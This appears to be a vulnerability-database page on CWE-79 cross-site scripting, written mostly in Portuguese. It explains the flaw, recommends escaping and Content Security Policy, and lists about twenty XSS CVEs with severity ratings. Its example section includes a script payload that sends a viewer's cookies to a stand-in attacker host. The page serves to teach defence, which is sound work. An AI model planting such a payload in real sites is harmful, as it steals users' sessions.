Fallos del tipo CWE-79

29.223 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-42365MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2022-42364MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2022-44463MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2026-40607HIGHMantisBT is Vulnerable to Stored XSS Through its Saved-Filter Owner ColumnEPSS 0.5%CVE-2022-35693MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2026-47324MEDIUMStored XSS in Multiple Points in ProjectsAndPrograms school-management-systemEPSS 0.5%CVE-2022-44467MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2022-42352MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2024-10850MEDIUMRazorpay Payment Button for Elementor <= 1.2.5 - Reflected Cross-Site ScriptingEPSS 0.5%CVE-2022-42350MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2025-64495HIGHOpen WebUI vulnerable to Stored DOM XSS via prompts when 'Insert Prompt as Rich Text' is enabled resulting in ATO/RCEEPSS 0.5%CVE-2023-25929MEDIUMIBM Cognos Analytics cross-site scriptingEPSS 0.5%CVE-2026-34463HIGHMantisBT has Stored HTML Injection/XSS via Clone Issue FormEPSS 0.5%CVE-2022-44471MEDIUMAEM Reflected XSS Arbitrary code executionEPSS 0.5%CVE-2023-2853MEDIUMXSS in SoftMed's SelfPatronEPSS 0.5%CVE-2023-51447MEDIUMDecidim vulnerable to cross-site scripting (XSS) in the dynamic file uploadsEPSS 0.5%CVE-2025-64338MEDIUMClipBucket's Manage Photos Feature is Vulnerable to Stored XSS via Collection NameEPSS 0.5%CVE-2024-3141LOWClavister E10/E80 Misc Settings Page MiscSettings cross site scriptingEPSS 0.5%CVE-2023-1881HIGHCross-site Scripting (XSS) - Stored in microweber/microweberEPSS 0.5%CVE-2024-2116MEDIUMChristmas Greetings <= 1.2.5 - Reflected Cross-Site ScriptingEPSS 0.5%